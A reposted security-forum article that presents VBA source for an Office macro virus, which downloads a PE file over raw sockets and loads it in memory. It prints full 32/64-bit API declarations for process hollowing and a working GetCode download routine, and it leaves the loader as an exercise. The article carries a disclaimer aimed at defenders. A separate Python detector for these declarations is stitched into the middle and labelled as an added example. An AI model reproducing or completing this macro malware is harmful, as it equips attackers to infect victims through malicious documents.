An Office macro virus that remotely downloads a PE and loads it in memory

admin, 2021-05-30 09:59:50

This article is a featured post from the 看雪论坛 (Kanxue forum).

看雪论坛 author ID: 某警官



1  Introduction


This code was written in early 2019. At the time, an APT group known as 海莲花 (OceanLotus) was using Office macros to load shellcode, using that shellcode to load the payload in memory, and loading a malicious DLL by way of "白加黑" (DLL side-loading through a legitimate signed executable). After fully reproducing their technique by following the published analysis reports, I wanted to experiment a little further.

In their code, both the shellcode and the PE file were decrypted from local files. On that basis I added downloading the PE file over the network straight into memory, loading the PE from memory directly in the Office macro, and support for both 32-bit and 64-bit systems.
    
This article covers the function and structure declarations of the download part. The project aims to explore what else malicious Office macros are capable of, so that blue teams can defend against them better; do not use it for illegal purposes.



2  Requirements analysis and preliminary design


2.1 Network download
Call the exported functions of ws2_32.dll from the macro.

2.2 In-memory loading
Call the exported functions of kernel32.dll from the macro.
  
2.3 32-bit and 64-bit compatibility
Every function and structure needs two sets of declarations and definitions, one per architecture.



3  Partial implementation


First, the required functions must be declared and the structures defined. I spent a long time on this part. The declarations of all the functions, covering both 32-bit and 64-bit, are as follows:

#If Win64 Then
    Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
    Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long
    Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()
    Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long
    Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
    Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
    Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
    Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long
    Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
    Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long
    Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long
    Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
    Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
    Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long
    Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long
    Public Declare Sub WSACleanup Lib "ws2_32.dll" ()
    Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long
    Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long
    Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long
    Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long
    Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long
    Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long
    Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long
    Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long
    Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
    Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long
    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
    Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
    Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long
    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
    Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long
    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If


With the functions declared above, a number of structures still need to be defined: those used for socket communication and those describing the PE file format.

Socket communication structures:

#If Win64 Then
    Private Type WSADATA
        wVersion As Integer
        wHighVersion As Integer
        szDescription(0 To WSADESCRIPTION_LEN) As Byte
        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
        iMaxSockets As Integer
        iMaxUdpDg As Integer
        lpVendorInfo As LongLong
    End Type
    Private Type ADDRINFO
        ai_flags As Long
        ai_family As Long
        ai_socktype As Long
        ai_protocol As Long
        ai_addrlen As Long
        ai_canonName As LongLong 'strptr
        ai_addr As LongLong 'p sockaddr
        ai_next As LongLong 'p addrinfo
    End Type
#Else
    Private Type WSADATA
        wVersion As Integer
        wHighVersion As Integer
        szDescription(0 To WSADESCRIPTION_LEN) As Byte
        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte
        iMaxSockets As Integer
        iMaxUdpDg As Integer
        lpVendorInfo As Long
    End Type
    Private Type ADDRINFO
        ai_flags As Long
        ai_family As Long
        ai_socktype As Long
        ai_protocol As Long
        ai_addrlen As Long
        ai_canonName As Long 'strptr
        ai_addr As Long 'p sockaddr
        ai_next As Long 'p addrinfo
    End Type
#End If


Some enumerations that are needed:

Enum AF
    AF_UNSPEC = 0
    AF_INET = 2
    AF_IPX = 6
    AF_APPLETALK = 16
    AF_NETBIOS = 17
    AF_INET6 = 23
    AF_IRDA = 26
    AF_BTH = 32
End Enum

Enum sock_type
    SOCK_STREAM = 1
    SOCK_DGRAM = 2
    SOCK_RAW = 3
    SOCK_RDM = 4
    SOCK_SEQPACKET = 5
End Enum


There are too many PE file structures to list here; write them in the same format and with the same types as above.

 

The download function:

Function GetCode()
    Dim m_wsaData As WSADATA
    Dim m_RetVal As Integer
    Dim m_Hints As ADDRINFO
    Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET
    Dim Server As String
    Dim port As String
    #If Win64 Then
        Dim pAddrInfo As LongLong
    #Else
        Dim pAddrInfo As Long
    #End If
    Dim RetVal As Long
    Dim lastError As Long

    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)
    If (RetVal <> 0) Then
        LogError "WSAStartup failed with error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    m_Hints.ai_family = AF.AF_UNSPEC
    m_Hints.ai_socktype = sock_type.SOCK_STREAM
    Server = "127.0.0.1"
    port = "9593"

    RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo)
    If (RetVal <> 0) Then
        LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    m_Hints.ai_next = pAddrInfo
    Dim connected As Boolean: connected = False
    Do While m_Hints.ai_next > 0 'Do While 1
        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)
        m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol)
        If (m_ConnSocket = INVALID_SOCKET) Then
            LogError "Error opening socket, error " & RetVal
        Else
            Dim connectionResult As Long
            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)
            If connectionResult <> SOCKET_ERROR Then
                connected = True
                Exit Do
            End If
            LogError "connect() to socket failed"
            closesocket (m_ConnSocket)
        End If
    Loop

    If Not connected Then
        LogError "Fatal error: unable to connect to the server", WSAGetLastError()
        Call WSACleanup
        Exit Function
    End If

    'Dim SendBuf() As Byte
    'SendBuf = StrConv("Message #1", vbNarrow)

    'Send
    Dim dataBuf As Variant
    dataBuf = Array(32, 42, 42, 5, 6)
    Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1
    Dim sendBuf() As Byte
    ReDim sendBuf(dataLen)
    'Print the data being sent
    Dim i As Long
    For i = 0 To dataLen - 1
        sendBuf(i) = dataBuf(i)
        Debug.Print sendBuf(i);
    Next i

    RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0)
    If RetVal = SOCKET_ERROR Then
        LogError "send() failed", WSAGetLastError()
        Call WSACleanup
        Exit Function
    Else
        Debug.Print "sent " & RetVal & " bytes"
    End If

    'Receive
    Dim payloadBuf() As Byte
    Dim recvBuf() As Byte
    Dim recvSize As Integer: recvSize = 32
    ReDim recvBuf(recvSize)
    Dim recvLen As Integer: recvLen = 0
    Dim index As Long: index = 0
    Do While 1
        recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0)
        'For i = 0 To recvLen - 1
        '    Debug.Print recvBuf(i);
        'Next i
        'Debug.Print
        If recvLen > 0 Then
            ReDim Preserve payloadBuf(index + recvLen)
            Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen)
            index = index + recvLen
        Else
            Exit Do
        End If
    Loop

    'Print the received data
    Debug.Print "接收到的长度为:";
    Debug.Print UBound(payloadBuf) - LBound(payloadBuf)
    'Debug.Print "接收到的数据为:";
    'For i = 0 To index - 1
    '    Debug.Print payloadBuf(i); 'a trailing <;> in Debug.Print suppresses the newline
    'Next i
    'Debug.Print

    RetVal = closesocket(m_ConnSocket)
    If RetVal <> 0 Then
        LogError "closesocket() failed", WSAGetLastError()
        Call WSACleanup
    Else
        Debug.Print "closed socket"
    End If

    GetCode = payloadBuf
End Function


That is the general idea and the code of the download part. Those interested can implement the in-memory loading part themselves; the difficulty lies mainly in the structure definitions.
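A defender-side check for the declaration pattern shown above, added here as an example and not part of the original article: it pulls the Declare statements out of VBA source and flags the combination of raw Winsock calls (the download function) with the process-hollowing API set (VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread, NtUnmapViewOfSection) that the declaration list carries. The sample macro text is constructed from a shortened subset of the article's declarations; the API groups and the threshold of three hollowing APIs are my own choices.

```python
import re

# Constructed sample, modelled on a subset of the Declare statements the
# article lists (parameter lists shortened); not the author's macro.
SAMPLE_VBA = '''#If Win64 Then
Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal v As Integer, ByRef d As WSADATA) As Long
Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef b As Any, ByVal n As Long, ByVal f As Long) As Long
Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal h As LongPtr, ByVal n As Long) As LongPtr
Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal h As LongPtr, ByVal n As Long) As Long
Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal h As LongPtr, c As CONTEXT) As Long
Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal h As LongPtr) As Long
Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal h As LongPtr, ByVal a As LongPtr) As Long
#End If'''

# One VBA Declare statement: optional scope, optional PtrSafe, VBA-side name, Lib, optional Alias.
DECLARE_RE = re.compile(
    r'^\s*(?:Public|Private)?\s*Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+'
    r'(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE | re.MULTILINE)

def extract_imports(vba_src):
    """Return the set of (dll, export) pairs a macro declares. The Alias wins over the
    VBA-side name (ws_socket -> socket); a bare "kernel32" is normalised to kernel32.dll."""
    found = set()
    for name, lib, alias in DECLARE_RE.findall(vba_src):
        dll = lib.lower()
        if not dll.endswith(".dll"):
            dll += ".dll"
        found.add((dll, (alias or name).lower()))
    return found

# Behaviour groups taken from the article's declaration list; the thresholds are my own.
WINSOCK = {("ws2_32.dll", n) for n in ("socket", "connect", "send", "recv", "getaddrinfo")}
HOLLOWING = {("kernel32.dll", n) for n in
             ("createprocessa", "virtualallocex", "writeprocessmemory",
              "getthreadcontext", "setthreadcontext", "resumethread")}
HOLLOWING.add(("ntdll.dll", "ntunmapviewofsection"))

def assess(vba_src):
    """Return a list of findings; an empty list means no suspicious combination."""
    imports = extract_imports(vba_src)
    findings = []
    if imports & WINSOCK:
        findings.append("raw Winsock I/O from a macro (download bypasses URLMon/WinHTTP)")
    if len(imports & HOLLOWING) >= 3:
        findings.append("process-hollowing API set (remote memory write plus thread context)")
    if len(findings) == 2:
        findings.append("download-and-inject chain: treat the document as malicious")
    return findings
```

Feed it the VBA text that olevba or a similar extractor dumps from a document; a benign macro that only automates Office objects declares none of these groups.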



4  Conclusion


Logically, Office macro programming is the same as Windows programming. The hard part is defining the structures and declaring the APIs, especially the PE file structures. Following the example above, in-memory loading can be implemented with a bit of time; it is not difficult, just tedious.

- End -





看雪 ID: 某警官

https://bbs.pediy.com/user-home-856450.htm

*This article was written by 某警官 of the 看雪论坛; when reposting, please credit the 看雪 community.




This article was first published on the WeChat official account 看雪学院 under the title "一个远程下载并内存加载PE的office宏病毒".

Reposted by CN-SEC 中文网 (with thanks to the original author); please keep this link when reposting: http://cn-sec.com/archives/385731.html
